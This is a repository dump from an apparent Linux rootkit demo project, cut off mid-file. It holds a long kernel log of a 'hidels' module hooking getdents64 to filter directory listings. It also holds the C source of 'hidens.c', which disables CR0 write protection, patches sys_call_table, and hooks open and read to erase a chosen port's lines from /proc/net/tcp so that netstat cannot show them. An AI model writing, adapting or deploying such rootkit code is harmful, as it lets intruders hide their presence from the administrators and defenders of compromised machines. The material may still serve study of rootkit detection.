Twisted_Core-11.1.0.egg-info 1264 | [ 253.421499] hpmudext.la 1265 | [ 253.421501] _renderPM.so 1266 | [ 253.421503] gstoption.so 1267 | [ 253.421506] Quirks 1268 | [ 253.421507] gobject 1269 | [ 253.421509] GnuPGInterface.pyc 1270 | [ 253.421512] serial 1271 | [ 253.421513] pcardext.so 1272 | [ 253.421515] smbc.so 1273 | [ 253.421517] ubuntuone-control-panel 1274 | [ 253.421520] reportlab 1275 | [ 253.421522] fdpexpect.py 1276 | [ 253.421524] gtk-2.0-pysupport-compat.pth 1277 | [ 253.421526] uno.pyc 1278 | [ 253.421528] LanguageSelector 1279 | [ 253.421531] ubuntuone-installer 1280 | [ 253.421533] libxml2.pyc 1281 | [ 253.421535] packagekit 1282 | [ 253.421537] orca 1283 | [ 253.421539] brlapi.so 1284 | [ 253.421541] duplicity 1285 | [ 253.421543] deb822.pyc 1286 | [ 253.421545] pyatspi 1287 | [ 253.421547] sessioninstaller 1288 | [ 253.421549] pcardext.la 1289 | [ 253.421551] lazr.uri-1.0.3.egg-info 1290 | [ 253.421553] oneconf-0.2.8.1.egg-info 1291 | [ 253.421556] ANSI.py 1292 | [ 253.421558] lazr 1293 | [ 253.421560] lazr.restfulclient-0.12.0-nspkg.pth 1294 | [ 253.421562] pexpect.py 1295 | [ 253.421564] zeitgeist 1296 | [ 253.421566] aptsources 1297 | [ 253.421568] pkg_resources.py 1298 | [ 253.421571] duplicity-0.6.18.egg-info 1299 | [ 253.421573] uno.py 1300 | [ 253.421575] apt_xapian_index-0.44.egg-info 1301 | [ 253.421578] markupsafe 1302 | [ 253.421580] Twisted_Web-11.1.0.egg-info 1303 | [ 253.421582] chardet 1304 | [ 253.421584] configglue 1305 | [ 253.421586] libproxy.pyc 1306 | [ 253.421588] zope 1307 | [ 253.421590] wadllib-1.3.0.egg-info 1308 | [ 253.421592] cupshelpers 1309 | [ 253.421594] gtk-2.0 1310 | [ 253.421596] apport_python_hook.pyc 1311 | [ 253.421599] pyinotify-0.9.2.egg-info 1312 | [ 253.421601] pygtk.py 1313 | [ 253.421603] ubuntuone-storage-protocol.pth 1314 | [ 253.421606] OpenSSL 1315 | [ 253.421608] finished hacked_getdents64. 1316 | [ 253.421649] finished hacked_getdents64. 1317 | [ 253.523630] 20dbus 1318 | [ 253.523636] 20archive 1319 | [ 253.523638] 01autoremove 1320 | [ 253.523641] .. 1321 | [ 253.523642] 00aptitude 1322 | [ 253.523644] 01autoremove-kernels 1323 | [ 253.523647] 50unattended-upgrades 1324 | [ 253.523649] 70debconf 1325 | [ 253.523651] . 1326 | [ 253.523653] 10periodic 1327 | [ 253.523655] 00trustcdrom 1328 | [ 253.523657] 99update-notifier 1329 | [ 253.523659] 20changelog 1330 | [ 253.523661] 15update-stamp 1331 | [ 253.523663] finished hacked_getdents64. 1332 | [ 253.523697] finished hacked_getdents64. 1333 | [ 253.619086] libpango1.0-0.modules 1334 | [ 253.619092] .. 1335 | [ 253.619094] . 1336 | [ 253.619096] finished hacked_getdents64. 1337 | [ 253.619420] finished hacked_getdents64. 1338 | [ 253.648276] DMZ-Black 1339 | [ 253.648282] whiteglass 1340 | [ 253.648284] ubuntu-mono-light 1341 | [ 253.648286] LowContrast 1342 | [ 253.648288] HighContrast 1343 | [ 253.648291] .. 1344 | [ 253.648292] HighContrastInverse 1345 | [ 253.648295] locolor 1346 | [ 253.648297] redglass 1347 | [ 253.648299] . 1348 | [ 253.648300] gnome 1349 | [ 253.648302] unity-icon-theme 1350 | [ 253.648305] Humanity-Dark 1351 | [ 253.648307] ubuntu-mono-dark 1352 | [ 253.648309] Humanity 1353 | [ 253.648311] default 1354 | [ 253.648313] handhelds 1355 | [ 253.648315] LoginIcons 1356 | [ 253.648317] DMZ-White 1357 | [ 253.648319] hicolor 1358 | [ 253.648321] finished hacked_getdents64. 1359 | [ 253.648330] finished hacked_getdents64. 1360 | [ 253.648394] gksu-root-terminal.png 1361 | [ 253.648398] gksu-debian.xpm 1362 | [ 253.648400] nautilus.xpm 1363 | [ 253.648402] evince.xpm 1364 | [ 253.648404] pstree32.xpm 1365 | [ 253.648406] evolution-data-server 1366 | [ 253.648408] faces 1367 | [ 253.648410] transmission.xpm 1368 | [ 253.648412] xterm_32x32.xpm 1369 | [ 253.648415] gnome-terminal.xpm 1370 | [ 253.648417] gnome-system-monitor 1371 | [ 253.648419] gnome-grecord.xpm 1372 | [ 253.648421] .. 1373 | [ 253.648423] pstree16.xpm 1374 | [ 253.648425] python.xpm 1375 | [ 253.648427] rhythmbox-small.xpm 1376 | [ 253.648429] gnome-eog.xpm 1377 | [ 253.648432] language-selector.png 1378 | [ 253.648434] baobab.xpm 1379 | [ 253.648436] debian-logo.png 1380 | [ 253.648438] gksu-icon.png 1381 | [ 253.648440] . 1382 | [ 253.648442] xterm_48x48.xpm 1383 | [ 253.648444] python2.7.xpm 1384 | [ 253.648446] aisleriot.xpm 1385 | [ 253.648448] gedit-icon.xpm 1386 | [ 253.648450] totem.xpm 1387 | [ 253.648452] xterm-color_32x32.xpm 1388 | [ 253.648455] file-roller.xpm 1389 | [ 253.648457] gksuexec-debian.xpm 1390 | [ 253.648459] firefox.png 1391 | [ 253.648461] ssh-askpass-gnome.png 1392 | [ 253.648464] hplj1020_icon.png 1393 | [ 253.648466] xterm-color_48x48.xpm 1394 | [ 253.648468] transmission.png 1395 | [ 253.648470] freecell.xpm 1396 | [ 253.648472] gcalctool.xpm 1397 | [ 253.648474] seahorse 1398 | [ 253.648476] thunderbird.png 1399 | [ 253.648479] ubuntu-screensaver.svg 1400 | [ 253.648481] gnome-nettool.xpm 1401 | [ 253.648483] gksu.png 1402 | [ 253.648485] pppoeconf.xpm 1403 | [ 253.648487] thunderbird.xpm 1404 | [ 253.648489] finished hacked_getdents64. 1405 | [ 253.648808] finished hacked_getdents64. 1406 | [ 254.214199] DMZ-Black 1407 | [ 254.214206] whiteglass 1408 | [ 254.214208] ubuntu-mono-light 1409 | [ 254.214210] LowContrast 1410 | [ 254.214213] HighContrast 1411 | [ 254.214215] .. 1412 | [ 254.214216] HighContrastInverse 1413 | [ 254.214219] locolor 1414 | [ 254.214221] redglass 1415 | [ 254.214223] . 1416 | [ 254.214224] gnome 1417 | [ 254.214226] unity-icon-theme 1418 | [ 254.214229] Humanity-Dark 1419 | [ 254.214231] ubuntu-mono-dark 1420 | [ 254.214233] Humanity 1421 | [ 254.214235] default 1422 | [ 254.214237] handhelds 1423 | [ 254.214239] LoginIcons 1424 | [ 254.214241] DMZ-White 1425 | [ 254.214243] hicolor 1426 | [ 254.214245] finished hacked_getdents64. 1427 | [ 254.214255] finished hacked_getdents64. 1428 | [ 254.214333] gksu-root-terminal.png 1429 | [ 254.214336] gksu-debian.xpm 1430 | [ 254.214339] nautilus.xpm 1431 | [ 254.214341] evince.xpm 1432 | [ 254.214343] pstree32.xpm 1433 | [ 254.214345] evolution-data-server 1434 | [ 254.214347] faces 1435 | [ 254.214349] transmission.xpm 1436 | [ 254.214351] xterm_32x32.xpm 1437 | [ 254.214353] gnome-terminal.xpm 1438 | [ 254.214356] gnome-system-monitor 1439 | [ 254.214358] gnome-grecord.xpm 1440 | [ 254.214360] .. 1441 | [ 254.214362] pstree16.xpm 1442 | [ 254.214364] python.xpm 1443 | [ 254.214366] rhythmbox-small.xpm 1444 | [ 254.214368] gnome-eog.xpm 1445 | [ 254.214370] language-selector.png 1446 | [ 254.214373] baobab.xpm 1447 | [ 254.214375] debian-logo.png 1448 | [ 254.214377] gksu-icon.png 1449 | [ 254.214379] . 1450 | [ 254.214381] xterm_48x48.xpm 1451 | [ 254.214383] python2.7.xpm 1452 | [ 254.214385] aisleriot.xpm 1453 | [ 254.214387] gedit-icon.xpm 1454 | [ 254.214389] totem.xpm 1455 | [ 254.214391] xterm-color_32x32.xpm 1456 | [ 254.214394] file-roller.xpm 1457 | [ 254.214396] gksuexec-debian.xpm 1458 | [ 254.214398] firefox.png 1459 | [ 254.214400] ssh-askpass-gnome.png 1460 | [ 254.214403] hplj1020_icon.png 1461 | [ 254.214405] xterm-color_48x48.xpm 1462 | [ 254.214407] transmission.png 1463 | [ 254.214409] freecell.xpm 1464 | [ 254.214411] gcalctool.xpm 1465 | [ 254.214414] seahorse 1466 | [ 254.214415] thunderbird.png 1467 | [ 254.214418] ubuntu-screensaver.svg 1468 | [ 254.214420] gnome-nettool.xpm 1469 | [ 254.214422] gksu.png 1470 | [ 254.214424] pppoeconf.xpm 1471 | [ 254.214426] thunderbird.xpm 1472 | [ 254.214429] finished hacked_getdents64. 1473 | [ 254.214512] finished hacked_getdents64. 1474 | [ 255.946012] Groovy 1475 | [ 255.946018] XML 1476 | [ 255.946020] Regular Expressions 1477 | [ 255.946023] Haskell 1478 | [ 255.946025] ActionScript 1479 | [ 255.946027] Matlab 1480 | [ 255.946029] ShellScript 1481 | [ 255.946031] Vintage 1482 | [ 255.946033] YAML 1483 | [ 255.946035] TCL 1484 | [ 255.946036] Diff 1485 | [ 255.946038] SyncedSideBar 1486 | [ 255.946040] Clojure 1487 | [ 255.946042] Text 1488 | [ 255.946044] OCaml 1489 | [ 255.946046] Java 1490 | [ 255.946048] HTML 1491 | [ 255.946050] Textile 1492 | [ 255.946051] C# 1493 | [ 255.946053] D 1494 | [ 255.946055] Package Control 1495 | [ 255.946057] Makefile 1496 | [ 255.946059] Graphviz 1497 | [ 255.946061] User 1498 | [ 255.946063] .. 1499 | [ 255.946065] SQL 1500 | [ 255.946067] Lisp 1501 | [ 255.946068] All Autocomplete 1502 | [ 255.946071] C++ 1503 | [ 255.946072] Batch File 1504 | [ 255.946074] Color Scheme - Default 1505 | [ 255.946077] CSS 1506 | [ 255.946079] . 1507 | [ 255.946080] Pylinter 1508 | [ 255.946082] Markdown 1509 | [ 255.946084] Theme - Default 1510 | [ 255.946087] Ruby 1511 | [ 255.946088] ASP 1512 | [ 255.946090] Python 1513 | [ 255.946092] AppleScript 1514 | [ 255.946094] Go 1515 | [ 255.946096] Perl 1516 | [ 255.946098] Scala 1517 | [ 255.946100] RestructuredText 1518 | [ 255.946102] JavaScript 1519 | [ 255.946104] Objective-C 1520 | [ 255.946106] Language - English 1521 | [ 255.946108] Rails 1522 | [ 255.946110] Default 1523 | [ 255.946112] LaTeX 1524 | [ 255.946114] Lua 1525 | [ 255.946116] Erlang 1526 | [ 255.946117] R 1527 | [ 255.946119] PHP 1528 | [ 255.946121] Color Scheme - Frontend Delight 1529 | [ 255.946124] finished hacked_getdents64. 1530 | [ 255.946280] finished hacked_getdents64. 1531 | [ 258.584607] hrtimer: interrupt took 8909636 ns 1532 | [ 275.944252] hidels_huabei.c 1533 | [ 275.944258] .hidels.o.cmd 1534 | [ 275.944261] hidels.c 1535 | [ 275.944263] .tmp_versions 1536 | [ 275.944265] hidels.mod.o 1537 | [ 275.944267] Makefile 1538 | [ 275.944269] .. 1539 | [ 275.944271] modules.order 1540 | [ 275.944273] . 1541 | [ 275.944275] hidels.o 1542 | [ 275.944277] hidels.ko 1543 | [ 275.944279] Module.symvers 1544 | [ 275.944281] .hidels.ko.cmd 1545 | [ 275.944283] mesg.txt 1546 | [ 275.944285] hidels.mod.c 1547 | [ 275.944287] .hidels.mod.o.cmd 1548 | [ 275.944290] finished hacked_getdents64. 1549 | [ 275.944320] finished hacked_getdents64. 1550 | [ 275.956668] README 1551 | [ 275.956675] .. 1552 | [ 275.956677] . 1553 | [ 275.956679] finished hacked_getdents64. 1554 | [ 275.956695] finished hacked_getdents64. 1555 | [ 275.965457] . 1556 | [ 275.965462] .. 1557 | [ 275.965464] 0 1558 | [ 275.965466] 1 1559 | [ 275.965468] 2 1560 | [ 275.965469] 3 1561 | [ 275.965489] 4 1562 | [ 275.965491] 6 1563 | [ 275.965492] 8 1564 | [ 275.965494] finished hacked_getdents64. 1565 | [ 275.965517] finished hacked_getdents64. 1566 | [ 275.975849] hidels: module removed 1567 | [ 526.468510] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready 1568 | [ 536.199483] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready 1569 | [ 645.293455] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready 1570 | [ 652.805627] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready 1571 | [ 669.265609] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready 1572 | [ 677.090705] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready 1573 | [ 3878.569773] sct: 0xc16380a0 1574 | [ 3878.569773] 1575 | [ 3878.569773] 1576 | [ 3878.569773] 1577 | [ 3878.569773] 1578 | [ 3878.569773] 1579 | [ 3878.569830] offset: 0xc11748d0 1580 | [ 3878.569830] 1581 | [ 3878.569830] 1582 | [ 3878.569830] 1583 | [ 3878.570204] hacked_getdents64: 0xf9a72000 1584 | [ 3878.570204] 1585 | [ 3878.570204] 1586 | [ 3878.570204] 1587 | [ 3878.570270] hidels: module loaded. 1588 | [ 3886.690247] . 1589 | [ 3886.690327] .. 1590 | [ 3886.690329] 0 1591 | [ 3886.690331] 1 1592 | [ 3886.690333] 2 1593 | [ 3886.690334] 3 1594 | [ 3886.690336] 4 1595 | [ 3886.690337] 5 1596 | [ 3886.690339] 6 1597 | [ 3886.690340] 7 1598 | [ 3886.690342] 8 1599 | [ 3886.690343] 9 1600 | [ 3886.690345] 10 1601 | [ 3886.690346] 11 1602 | [ 3886.690348] 12 1603 | [ 3886.690349] 13 1604 | [ 3886.690351] 14 1605 | [ 3886.690352] 15 1606 | [ 3886.690354] 16 1607 | [ 3886.690355] 17 1608 | [ 3886.690357] 18 1609 | [ 3886.690359] 19 1610 | [ 3886.690360] 20 1611 | [ 3886.690362] 21 1612 | [ 3886.690363] 22 1613 | [ 3886.690365] 23 1614 | [ 3886.690366] 24 1615 | [ 3886.690368] 25 1616 | [ 3886.690369] 26 1617 | [ 3886.690371] 27 1618 | [ 3886.690372] 28 1619 | [ 3886.690374] 29 1620 | [ 3886.690375] 32 1621 | [ 3886.690390] finished hacked_getdents64. 1622 | [ 3886.690477] finished hacked_getdents64. 1623 | [ 3887.015118] autoconf 1624 | [ 3887.015124] mount 1625 | [ 3887.015126] cvs 1626 | [ 3887.015128] gpg2 1627 | [ 3887.015130] larch 1628 | [ 3887.015131] perl 1629 | [ 3887.015133] freeciv 1630 | [ 3887.015135] freerdp 1631 | [ 3887.015136] svk 1632 | [ 3887.015138] mc 1633 | [ 3887.015140] pon 1634 | [ 3887.015141] lisp 1635 | [ 3887.015143] ipv6calc 1636 | [ 3887.015145] xhost 1637 | [ 3887.015146] unrar 1638 | [ 3887.015148] open-iscsi 1639 | [ 3887.015150] monodevelop 1640 | [ 3887.015152] e2fsprogs 1641 | [ 3887.015153] bluez 1642 | [ 3887.015155] libreoffice.sh 1643 | [ 3887.015157] lzop 1644 | [ 3887.015159] sh 1645 | [ 3887.015160] qdbus 1646 | [ 3887.015162] hping2 1647 | [ 3887.015163] rsync 1648 | [ 3887.015165] service 1649 | [ 3887.015167] chkconfig 1650 | [ 3887.015169] gresource-bash-completion.sh 1651 | [ 3887.015171] p4 1652 | [ 3887.015173] medusa 1653 | [ 3887.015174] aptitude 1654 | [ 3887.015176] insserv 1655 | [ 3887.015178] mkinitrd 1656 | [ 3887.015180] wodim 1657 | [ 3887.015181] isql 1658 | [ 3887.015183] postgresql 1659 | [ 3887.015185] apt-build 1660 | [ 3887.015186] desktop-file-validate 1661 | [ 3887.015189] iproute2 1662 | [ 3887.015190] qemu 1663 | [ 3887.015192] getent 1664 | [ 3887.015194] chsh 1665 | [ 3887.015195] pine 1666 | [ 3887.015197] sitecopy 1667 | [ 3887.015202] bzip2 1668 | [ 3887.015205] minicom 1669 | [ 3887.015207] iptables 1670 | [ 3887.015209] xrdb 1671 | [ 3887.015210] sqlite3 1672 | [ 3887.015212] resolvconf 1673 | [ 3887.015214] ipsec 1674 | [ 3887.015216] helpers 1675 | [ 3887.015217] portupgrade 1676 | [ 3887.015219] cvsps 1677 | [ 3887.015221] pkgtools 1678 | [ 3887.015223] cowsay 1679 | [ 3887.015224] lsof 1680 | [ 3887.015226] mysqladmin 1681 | [ 3887.015228] k3b 1682 | [ 3887.015229] .. 1683 | [ 3887.015231] vncviewer 1684 | [ 3887.015233] gzip 1685 | [ 3887.015234] rfkill 1686 | [ 3887.015236] dvd+rw-tools 1687 | [ 3887.015238] iconv 1688 | [ 3887.015239] zeitgeist-daemon 1689 | [ 3887.015241] screen 1690 | [ 3887.015243] cardctl 1691 | [ 3887.015245] pm-utils 1692 | [ 3887.015247] gcc 1693 | [ 3887.015248] shadow 1694 | [ 3887.015250] cpan2dist 1695 | [ 3887.015252] xmms 1696 | [ 3887.015253] cfengine 1697 | [ 3887.015255] rpm 1698 | [ 3887.015257] gvfs-bash-completion.sh 1699 | [ 3887.015259] rdesktop 1700 | [ 3887.015261] mcrypt 1701 | [ 3887.015262] info 1702 | [ 3887.015264] autorpm 1703 | [ 3887.015266] cksfv 1704 | [ 3887.015267] apt 1705 | [ 3887.015269] jar 1706 | [ 3887.015270] python 1707 | [ 3887.015272] fuse 1708 | [ 3887.015274] vpnc 1709 | [ 3887.015275] postfix 1710 | [ 3887.015277] wvdial 1711 | [ 3887.015279] tar 1712 | [ 3887.015280] util-linux 1713 | [ 3887.015282] ufw 1714 | [ 3887.015284] lilo 1715 | [ 3887.015285] man 1716 | [ 3887.015287] procps 1717 | [ 3887.015289] module-init-tools 1718 | [ 3887.015291] rcs 1719 | [ 3887.015292] bash-builtins 1720 | [ 3887.015294] tcpdump 1721 | [ 3887.015296] ifupdown 1722 | [ 3887.015298] sshfs 1723 | [ 3887.015299] ncftp 1724 | [ 3887.015301] xz 1725 | [ 3887.015302] xmllint 1726 | [ 3887.015304] dselect 1727 | [ 3887.015306] upstart 1728 | [ 3887.015308] apache2ctl 1729 | [ 3887.015309] . 1730 | [ 3887.015311] gnatmake 1731 | [ 3887.015313] pkg-config 1732 | [ 3887.015315] java 1733 | [ 3887.015316] ldapvi 1734 | [ 3887.015318] nmap 1735 | [ 3887.015320] ipmitool 1736 | [ 3887.015321] net-tools 1737 | [ 3887.015323] dpkg 1738 | [ 3887.015325] gdb 1739 | [ 3887.015326] kldload 1740 | [ 3887.015328] abook 1741 | [ 3887.015330] grub 1742 | [ 3887.015331] initramfs-tools 1743 | [ 3887.015333] wtf 1744 | [ 3887.015335] povray 1745 | [ 3887.015337] openssl 1746 | [ 3887.015338] cryptsetup 1747 | [ 3887.015340] sbcl 1748 | [ 3887.015342] debconf 1749 | [ 3887.015344] dhclient 1750 | [ 3887.015345] xrandr 1751 | [ 3887.015347] gdbus-bash-completion.sh 1752 | [ 3887.015349] rrdtool 1753 | [ 3887.015351] lintian 1754 | [ 3887.015353] links 1755 | [ 3887.015442] dsniff 1756 | [ 3887.015445] munin-node 1757 | [ 3887.015447] cpio 1758 | [ 3887.015449] rpmcheck 1759 | [ 3887.015451] lftp 1760 | [ 3887.015452] sysbench 1761 | [ 3887.015454] bind-utils 1762 | [ 3887.015456] gsettings-bash-completion.sh 1763 | [ 3887.015458] dd 1764 | [ 3887.015460] ri 1765 | [ 3887.015462] crontab 1766 | [ 3887.015463] pkg_install 1767 | [ 3887.015465] wol 1768 | [ 3887.015467] openldap 1769 | [ 3887.015469] xmodmap 1770 | [ 3887.015470] gcl 1771 | [ 3887.015472] snownews 1772 | [ 3887.015474] lrzip 1773 | [ 3887.015475] yp-tools 1774 | [ 3887.015477] mutt 1775 | [ 3887.015479] strace 1776 | [ 3887.015480] lvm 1777 | [ 3887.015482] cups 1778 | [ 3887.015484] quota-tools 1779 | [ 3887.015485] make 1780 | [ 3887.015487] bitkeeper 1781 | [ 3887.015489] unace 1782 | [ 3887.015491] dict 1783 | [ 3887.015492] findutils 1784 | [ 3887.015494] ntpdate 1785 | [ 3887.015496] xsltproc 1786 | [ 3887.015497] yum-arch 1787 | [ 3887.015499] mplayer 1788 | [ 3887.015501] xm 1789 | [ 3887.015502] gpg 1790 | [ 3887.015504] coreutils 1791 | [ 3887.015506] genisoimage 1792 | [ 3887.015508] sysctl 1793 | [ 3887.015509] ant 1794 | [ 3887.015511] configure 1795 | [ 3887.015513] smartctl 1796 | [ 3887.015514] aspell 1797 | [ 3887.015516] heimdal 1798 | [ 3887.015518] gkrellm 1799 | [ 3887.015520] bittorrent 1800 | [ 3887.015521] reportbug 1801 | [ 3887.015523] msynctool 1802 | [ 3887.015525] imagemagick 1803 | [ 3887.015527] wireless-tools 1804 | [ 3887.015529] lzma 1805 | [ 3887.015530] xmlwf 1806 | [ 3887.015532] mailman 1807 | [ 3887.015534] clisp 1808 | [ 3887.015535] iftop 1809 | [ 3887.015537] apport_completion 1810 | [ 3887.015539] rpcdebug 1811 | [ 3887.015541] brctl 1812 | [ 3887.015542] rtcwake 1813 | [ 3887.015544] samba 1814 | [ 3887.015546] update-alternatives 1815 | [ 3887.015548] sysv-rc 1816 | [ 3887.015550] axi-cache 1817 | [ 3887.015551] automake 1818 | [ 3887.015553] mdadm 1819 | [ 3887.015555] ssh 1820 | [ 3887.015557] finished hacked_getdents64. 1821 | [ 3887.019733] finished hacked_getdents64. 1822 | [ 3887.300569] rc 1823 | [ 3887.300575] alsa-store 1824 | [ 3887.300577] acpi-support 1825 | [ 3887.300579] stop-bootlogd 1826 | [ 3887.300581] irqbalance 1827 | [ 3887.300583] console-setup 1828 | [ 3887.300585] hwclock 1829 | [ 3887.300587] rsyslog 1830 | [ 3887.300589] udev-finish 1831 | [ 3887.300590] plymouth-splash 1832 | [ 3887.300592] udevmonitor 1833 | [ 3887.300597] whoopsie 1834 | [ 3887.300599] grub-common 1835 | [ 3887.300601] single 1836 | [ 3887.300602] apport 1837 | [ 3887.300604] network-interface-container 1838 | [ 3887.300606] umountnfs.sh 1839 | [ 3887.300608] README 1840 | [ 3887.300610] network-interface-security 1841 | [ 3887.300612] atd 1842 | [ 3887.300614] rsync 1843 | [ 3887.300616] plymouth-log 1844 | [ 3887.300618] rfkill-restore 1845 | [ 3887.300620] udevtrigger 1846 | [ 3887.300622] hostname 1847 | [ 3887.300623] brltty 1848 | [ 3887.300625] sudo 1849 | [ 3887.300627] speech-dispatcher 1850 | [ 3887.300629] avahi-daemon 1851 | [ 3887.300631] resolvconf 1852 | [ 3887.300632] network-interface 1853 | [ 3887.300634] kerneloops 1854 | [ 3887.300636] bootlogd 1855 | [ 3887.300638] modemmanager 1856 | [ 3887.300640] cron 1857 | [ 3887.300642] .. 1858 | [ 3887.300643] hwclock-save 1859 | [ 3887.300645] plymouth-upstart-bridge 1860 | [ 3887.300647] plymouth 1861 | [ 3887.300649] setvtrgb 1862 | [ 3887.300651] bluetooth 1863 | [ 3887.300653] ufw 1864 | [ 3887.300654] rc.local 1865 | [ 3887.300656] procps 1866 | [ 3887.300658] module-init-tools 1867 | [ 3887.300660] dmesg 1868 | [ 3887.300662] passwd 1869 | [ 3887.300663] . 1870 | [ 3887.300665] ondemand 1871 | [ 3887.300667] plymouth-ready 1872 | [ 3887.300669] failsafe-x 1873 | [ 3887.300670] umountfs 1874 | [ 3887.300672] sendsigs 1875 | [ 3887.300674] unattended-upgrades 1876 | [ 3887.300676] dbus 1877 | [ 3887.300678] .legacy-bootordering 1878 | [ 3887.300680] anacron 1879 | [ 3887.300682] network-manager 1880 | [ 3887.300684] lightdm 1881 | [ 3887.300685] apparmor 1882 | [ 3887.300687] saned 1883 | [ 3887.300689] pulseaudio 1884 | [ 3887.300691] udev-fallback-graphics 1885 | [ 3887.300693] networking 1886 | [ 3887.300695] cups 1887 | [ 3887.300696] plymouth-stop 1888 | [ 3887.300698] pppd-dns 1889 | [ 3887.300700] halt 1890 | [ 3887.300702] skeleton 1891 | [ 3887.300704] stop-bootlogd-single 1892 | [ 3887.300706] rcS 1893 | [ 3887.300707] friendly-recovery 1894 | [ 3887.300709] dns-clean 1895 | [ 3887.300711] udev 1896 | [ 3887.300713] urandom 1897 | [ 3887.300714] reboot 1898 | [ 3887.300716] killprocs 1899 | [ 3887.300718] alsa-restore 1900 | [ 3887.300720] rfkill-store 1901 | [ 3887.300722] x11-common 1902 | [ 3887.300724] umountroot 1903 | [ 3887.300725] acpid 1904 | [ 3887.300727] finished hacked_getdents64. 1905 | [ 3887.300804] finished hacked_getdents64. 1906 | [ 3890.886755] hidels_huabei.c 1907 | [ 3890.886763] .hidels.o.cmd 1908 | [ 3890.886765] hidels.c 1909 | [ 3890.886767] .tmp_versions 1910 | [ 3890.886769] hidels.mod.o 1911 | [ 3890.886771] Makefile 1912 | [ 3890.886773] .. 1913 | [ 3890.886775] modules.order 1914 | [ 3890.886777] . 1915 | [ 3890.886778] hidels.o 1916 | [ 3890.886780] hidels.ko 1917 | [ 3890.886782] Module.symvers 1918 | [ 3890.886784] .hidels.ko.cmd 1919 | [ 3890.886786] mesg.txt 1920 | [ 3890.886788] hidels.mod.c 1921 | [ 3890.886790] .hidels.mod.o.cmd 1922 | [ 3890.886792] finished hacked_getdents64. 1923 | [ 3890.886843] finished hacked_getdents64. 1924 | -------------------------------------------------------------------------------- /src/ls/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/rootkit/RootkitWS/Rootkit/ls/hidels.ko 2 | -------------------------------------------------------------------------------- /src/netstat/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/netstat/Makefile -------------------------------------------------------------------------------- /src/netstat/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/netstat/Module.symvers -------------------------------------------------------------------------------- /src/netstat/hidens.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | 为了隐藏netstat所写出的文件 4 | 5 | author:Edward 6 | 7 | date:2/28 8 | 9 | 未完成内容:提供一个端口号,转换成16进制数,然后作为关键词删除 10 | 11 | */ 12 | 13 | 14 | 15 | #include 16 | 17 | #include 18 | 19 | #include 20 | 21 | #include 22 | #include /*struct file*/ 23 | 24 | #include /*fget() fput()*/ 25 | 26 | #include /*d_path()*/ 27 | 28 | #include 29 | 30 | #define CALLOFF 100 31 | 32 | MODULE_LICENSE("GPL"); //设置模块的许可证 33 | 34 | /* 35 | 36 | 这个sys_call_table,我是通过在/boot/System.map带头的文件,用root权限,以vim查看,用/sys_call_table来查找,得到的系统调用表地址 37 | */ 38 | 39 | /* 40 | 41 | 由于系统调用表所在的内存区域通常为只读的,不可写,我们要修改这片区域的权限,需要在cr0寄存器的特定位17位设置0,使该内存区域具有写权限,因此我们要把原cr0寄存器的值取出,再将寄存器与上0xfffeffff,使得第17位置0 42 | 43 | */ 44 | 45 | 46 | struct { 47 | 48 | unsigned short limit; 49 | 50 | unsigned int base; 51 | 52 | } __attribute__ ((packed)) idtr; 53 | 54 | 55 | 56 | struct { 57 | 58 | unsigned short off1; 59 | 60 | unsigned short sel; 61 | 62 | unsigned char none,flags; 63 | 64 | unsigned short off2; 65 | 66 | } __attribute__ ((packed)) * idt; 67 | 68 | 69 | 70 | 71 | 72 | 73 | char * pc_FdName = NULL; 74 | 75 | const char * tagetString="/proc/net/tcp"; 76 | int tcpflag=0; 77 | int find=0; 78 | 79 | 80 | 81 | void ** sys_call_table; 82 | 83 | asmlinkage ssize_t (*origin_read)(int fd, const void *buf, size_t count); 84 | 85 | asmlinkage int (*origin_open)(const char *pathname, int flags); 86 | 87 | unsigned int clear_cr0(void) 88 | 89 | { 90 | 91 | unsigned int cr0=0; 92 | 93 | unsigned int ret; 94 | 95 | asm volatile ("movl %%cr0,%%eax":"=a"(cr0)); 96 | 97 | ret=cr0;//取出原有值 98 | 99 | cr0 &=0xfffeffff;//第17位置0 100 | 101 | asm volatile ("movl %%eax,%%cr0"::"a"(cr0));//将修改过的cr0存回原寄存器 102 | 103 | return ret; 104 | 105 | } 106 | 107 | void setback_cr0(unsigned int val) 108 | 109 | { 110 | 111 | asm volatile ("movl %%eax,%%cr0"::"a"(val));//将cr0寄存器的值设为val 112 | 113 | } 114 | 115 | int searchKeyword(void *buf,size_t count){ 116 | 117 | char *p; 118 | for(p=buf;p<(char*)(buf+count);p++){ 119 | if(*p=='1'&&*(p+1)=='F'&&*(p+2)=='5'&&*(p+3)=='7') 120 | { 121 | return 1; 122 | } 123 | } 124 | return 0; 125 | } 126 | ssize_t rmKeyWord(void *buf,size_t count){ 127 | 128 | char* startLine; 129 | char* endLine; 130 | char* mybuf; 131 | 132 | char* p; 133 | int length; 134 | 135 | mybuf=startLine=endLine=buf; 136 | 137 | 138 | for(p=buf;p<(char *)(buf+count);p++){ 139 | if( *p=='\x0a' || *p=='\x0d'){ // if here is the '\n' or '\r' 140 | endLine=p; 141 | 142 | length=endLine-startLine; 143 | if(searchKeyword(startLine,length)){ 144 | memmove(startLine,endLine+1,count-(int)(endLine+1-mybuf)); 145 | count=count-length-1; 146 | p-=length; 147 | } 148 | //startLine=p+sizeof(char); 149 | startLine=p; 150 | } 151 | 152 | } 153 | return count; 154 | } 155 | 156 | 157 | 158 | asmlinkage int hooked_open(const char *pathname, int flags){ 159 | int res; 160 | 161 | if(!strcmp(pathname,tagetString)) 162 | { 163 | tcpflag=1; 164 | } 165 | else 166 | tcpflag=0; 167 | 168 | res=(*origin_open)(pathname,flags); 169 | 170 | return res; 171 | 172 | } 173 | 174 | 175 | 176 | asmlinkage ssize_t hooked_read(int fd, void *buf, size_t count){ 177 | 178 | ssize_t res; 179 | res=(*origin_read)(fd,buf,count); 180 | 181 | 182 | if(tcpflag){ 183 | res=rmKeyWord(buf,res); 184 | } 185 | 186 | return res; 187 | } 188 | 189 | 190 | 191 